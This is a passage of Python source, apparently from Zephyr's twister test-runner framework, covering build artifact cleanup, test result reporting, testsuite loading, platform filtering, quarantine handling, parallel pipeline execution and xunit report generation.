for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed"]:
if instance.status == "error":
results.error += 1
else:
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testsuite.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status in ["skipped", "filtered"]:
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testsuite.testcases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for case in instance.testcases:
if case.status == 'skipped':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status in ["skipped", "filtered"]:
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.execution_time
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
if ( instance.status in ["error", "failed", "timeout", "flash_error"]
and hasattr(self.instance.handler, 'seed')
and self.instance.handler.seed is not None ):
more_info += "/seed: " + str(self.seed)
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do , instance.platform.name,
instance.testsuite.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testsuite.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
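            # e.g. an arg of the form OVERLAY_CONFIG="overlay1.conf overlay2.conf"
            # (illustrative) is pulled out here and merged with any other overlays.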
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.testplan = self.testplan
            if (self.seed is not None and instance.platform.name.startswith("native_posix")):
                self.parse_generated()
                if ('CONFIG_FAKE_ENTROPY_NATIVE_POSIX' in self.defconfig and
                        self.defconfig['CONFIG_FAKE_ENTROPY_NATIVE_POSIX'] == 'y'):
instance.handler.seed = self.seed
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.testplan.enable_size_report and not self.testplan.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.execution_time
class TestPlan(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
ts_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testsuite-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testsuite_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"testcases": {"type": "list", "default": []},
"platform_type": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}},
"seed": {"type": "int", "default": 0}
}
SAMPLE_FILENAME = 'sample.yaml'
TESTSUITE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testsuite_roots=[], outdir=None):
self.roots = testsuite_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Test Plan Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.detailed_skipped_report = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
        self.enable_size_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
self.seed = 0
# Keep track of which test cases we've filtered out and why
self.testsuites = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
self.timestamp = datetime.now().isoformat()
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testsuite.testcases)
if instance.status == 'filtered':
results.skipped_filter += 1
results.skipped_configs += 1
elif instance.status == 'passed':
results.passed += 1
results.done += 1
elif instance.status == 'error':
results.error += 1
results.done += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
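        # The saved report is expected to look like (illustrative):
        #   {"testsuites": [{"name": ..., "platform": ...,
        #                    "ram_size": ..., "rom_size": ...}, ...]}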
with open(filename) as fp:
jt = json.load(fp)
for ts in jt.get("testsuites", []):
d = {}
for m, _, _ in interesting_metrics:
d[m] = ts.get(m, 0)
ts_name = ts.get('name')
ts_platform = ts.get('platform')
saved_metrics[(ts_name, ts_platform)] = d
for instance in self.instances.values():
mkey = (instance.testsuite.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testsuite.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
# FIXME: need a better way to identify executed tests
handler_time = instance.metrics.get('handler_time', 0)
if float(handler_time) > 0:
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed + results.error,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
built_only = results.total - run - results.skipped_configs
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{built_only}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, platform_reports):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
json_file = filename + ".json"
self.json_report(json_file, version=self.version)
self.xunit_report(json_file, filename + ".xml", full_report=False)
self.xunit_report(json_file, filename + "_report.xml", full_report=True)
self.xunit_report_suites(json_file, filename + "_suite_report.xml")
if platform_reports:
self.target_report(json_file, outdir, suffix)
def target_report(self, json_file, outdir, suffix):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(json_file, filename, platform, full_report=True)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
testcases = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
testcases.append(case)
return testcases
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testsuites(self, testsuite_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTSUITE_FILENAME in filenames:
filename = self.TESTSUITE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
ts_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(ts_path, self.ts_schema)
parsed_data.load()
ts_path = os.path.dirname(ts_path)
workdir = os.path.relpath(ts_path, root)
for name in parsed_data.tests.keys():
ts = TestSuite(root, workdir, name)
ts_dict = parsed_data.get_test(name, self.testsuite_valid_keys)
ts.source_dir = ts_path
ts.yamlfile = ts_path
ts.type = ts_dict["type"]
ts.tags = ts_dict["tags"]
ts.extra_args = ts_dict["extra_args"]
ts.extra_configs = ts_dict["extra_configs"]
ts.arch_allow = ts_dict["arch_allow"]
ts.arch_exclude = ts_dict["arch_exclude"]
ts.skip = ts_dict["skip"]
ts.platform_exclude = ts_dict["platform_exclude"]
ts.platform_allow = ts_dict["platform_allow"]
ts.platform_type = ts_dict["platform_type"]
ts.toolchain_exclude = ts_dict["toolchain_exclude"]
ts.toolchain_allow = ts_dict["toolchain_allow"]
ts.ts_filter = ts_dict["filter"]
ts.timeout = ts_dict["timeout"]
ts.harness = ts_dict["harness"]
ts.harness_config = ts_dict["harness_config"]
if ts.harness == 'console' and not ts.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
ts.build_only = ts_dict["build_only"]
ts.build_on_all = ts_dict["build_on_all"]
ts.slow = ts_dict["slow"]
ts.min_ram = ts_dict["min_ram"]
ts.modules = ts_dict["modules"]
ts.depends_on = ts_dict["depends_on"]
ts.min_flash = ts_dict["min_flash"]
ts.extra_sections = ts_dict["extra_sections"]
ts.integration_platforms = ts_dict["integration_platforms"]
ts.seed = ts_dict["seed"]
testcases = ts_dict.get("testcases", [])
if testcases:
for tc in testcases:
ts.add_testcase(name=f"{name}.{tc}")
else:
ts.parse_subcases(ts_path)
if testsuite_filter:
if ts.name and ts.name in testsuite_filter:
self.testsuites[ts.name] = ts
else:
self.testsuites[ts.name] = ts
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (ts_path, e))
self.load_errors += 1
return len(self.testsuites)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
        Loads the quarantine list from the given yaml file. Creates a dictionary
        of all test configurations (platform + scenario: comment) that shall be
        skipped due to quarantine.
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_platform=[]):
with open(file, "r") as json_test_plan:
jtp = json.load(json_test_plan)
instance_list = []
for ts in jtp.get("testsuites", []):
logger.debug(f"loading {ts['name']}...")
testsuite = ts["name"]
platform = self.get_platform(ts["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testsuites[testsuite], platform, self.outdir)
if ts.get("run_id"):
instance.run_id = ts.get("run_id")
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.metrics['handler_time'] = ts.get('execution_time', 0)
instance.metrics['ram_size'] = ts.get("ram_size", 0)
instance.metrics['rom_size'] = ts.get("rom_size",0)
status = ts.get('status', None)
reason = ts.get("reason", "Unknown")
if status in ["error", "failed"]:
instance.status = None
instance.reason = None
# test marked as passed (built only) but can run when
# --test-only is used. Reset status to capture new results.
elif status == 'passed' and instance.run and self.test_only:
instance.status = None
instance.reason = None
else:
instance.status = status
instance.reason = reason
for tc in ts.get('testcases', []):
identifier = tc['identifier']
tc_status = tc.get('status', None)
tc_reason = None
# we set reason only if status is valid, it might have been
# reset above...
if instance.status:
tc_reason = tc.get('reason')
if tc_status:
case = instance.set_case_status_by_name(identifier, tc_status, tc_reason)
case.duration = tc.get('execution_time', 0)
if tc.get('log'):
case.output = tc.get('log')
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testsuite_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
            # When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, f"platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testsuite list...")
for ts_name, ts in self.testsuites.items():
if ts.build_on_all and not platform_filter:
platform_scope = self.platforms
elif ts.integration_platforms and self.integration:
self.verify_platforms_existence(
ts.integration_platforms, f"{ts_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in ts.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and ts.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if ts.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
ts.platform_allow, f"{ts_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in ts.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in ts.platform_allow, \
self.platforms))
# list of instances per testsuite, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(ts, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if ts.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (ts.type == "unit"):
# Discard silently
continue
if ts.modules and self.modules:
if not set(ts.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(ts.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and ts.integration_platforms and plat.name not in ts.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if ts.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not ts.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testsuite tag filter")
if exclude_tag and ts.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testsuite exclude filter")
if testsuite_filter and ts_name not in testsuite_filter:
discards[instance] = discards.get(instance, "TestSuite name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testsuite arch filter")
if not force_platform:
if ts.arch_allow and plat.arch not in ts.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if ts.arch_exclude and plat.arch in ts.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if ts.platform_exclude and plat.name in ts.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if ts.toolchain_exclude and toolchain in ts.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if ts.platform_allow and plat.name not in ts.platform_allow:
discards[instance] = discards.get(instance, "Not in testsuite platform allow list")
if ts.platform_type and plat.type not in ts.platform_type:
discards[instance] = discards.get(instance, "Not in testsuite platform type list")
if ts.toolchain_allow and toolchain not in ts.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testsuite toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and ts.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < ts.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if ts.depends_on:
dep_intersection = ts.depends_on.intersection(set(plat.supported))
if dep_intersection != set(ts.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < ts.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testsuite.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testsuite
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not ts.build_on_all and not integration:
if ts.platform_allow:
a = set(self.default_platforms)
b = set(ts.platform_allow)
c = a.intersection(b)
if c:
                        aa = list(filter(lambda inst: inst.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
                    instances = list(filter(lambda inst: inst.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in ts.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
                for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
            # If integration mode is on, all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testsuite.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "filtered"
instance.add_missing_testscases(instance.status)
# Remove from discards configurations that must not be discarded
# (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
no_retry_statuses = ['passed', 'skipped', 'filtered']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check,
seed=self.seed
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
@staticmethod
def xunit_testcase(eleTestsuite, name, classname, status, ts_status, reason, duration, runnable, stats, log, build_only_as_skip):
fails, passes, errors, skips = stats
if status in ['skipped', 'filtered']:
duration = 0
eleTestcase = ET.SubElement(
eleTestsuite, "testcase",
classname=classname,
name=f"{name}",
time=f"{duration}")
if status in ['skipped', 'filtered']:
skips += 1
# temporarily add build_only_as_skip to restore existing CI report behaviour
if ts_status == "passed" and not runnable:
tc_type = "build"
else:
tc_type = status
ET.SubElement(eleTestcase, 'skipped', type=f"{tc_type}", message=f"{reason}")
elif status in ["failed", "blocked"]:
fails += 1
el = ET.SubElement(eleTestcase, 'failure', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == "error":
errors += 1
el = ET.SubElement(eleTestcase, 'error', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == 'passed':
if not runnable and build_only_as_skip:
ET.SubElement(eleTestcase, 'skipped', type="build", message="built only")
skips += 1
else:
passes += 1
else:
if not status:
logger.debug(f"{name}: No status")
ET.SubElement(eleTestcase, 'skipped', type=f"untested", message="No results captured, testsuite misconfiguration?")
else:
logger.error(f"{name}: Unknown status '{status}'")
return (fails, passes, errors, skips)
# Generate a report with all testsuites instead of doing this per platform
def xunit_report_suites(self, json_file, filename):
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
suites_to_report = all_suites
